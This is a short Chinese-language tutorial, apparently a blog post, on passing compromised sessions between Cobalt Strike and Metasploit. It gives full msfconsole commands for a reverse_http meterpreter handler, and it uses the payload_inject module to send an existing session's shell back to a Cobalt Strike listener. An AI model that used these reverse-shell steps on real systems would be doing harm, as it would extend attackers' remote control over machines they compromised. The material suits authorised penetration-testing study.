Cobaltstrike与MSF会话派生
Cobaltstrike与MSF会话派生
一般在渗透的过程中,Get到shell之后一般来说我喜欢上线到Cobaltstrike,但是Cobaltstrike的会话是60S更新一次,有时候功能也并没有MSF完善,那么今天记录一下如何实现Cobaltstrike与MSF的联动。
Cobaltstrike派生会话
1.msf创建监听
msf6 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_http payload => windows/meterpreter/reverse_http msf6 exploit(multi/handler) > set lhost 192.168.37.134 lhost => 192.168.37.134 msf6 exploit(multi/handler) > set lport 8088 lport => 8088 msf6 exploit(multi/handler) > run -j
2.cs新建一个监听器,地址为msf地址,端口为msf的监听端口
3.在 cs的现有会话上增加会话
4.选择刚刚建立的监听器
此时msf中就会出现session
Metasploit派生会话
如果Metasploit已经获取到了一个会话,可以通过payload_inject模块进行会话派生,将会话传递到Cobaltstrike。
1.首先在cs中开启监听
2.msf配置。
use exploit/windows/local/payload_inject set payload windows/meterpreter/reverse_http set DisablePayloadHandler true #默认情况下,payload_inject执行之后会在本地产生一个新的handler,由于我们已经有了一个,所以不需要在产生一个,所以这里我们设置为true set lhost x.x.x.x #cobaltstrike监听的ip set lport 6789 #cobaltstrike监听的端口 set session 1 #这里是获得的session的id exploit
3.返回CS查看反弹成功。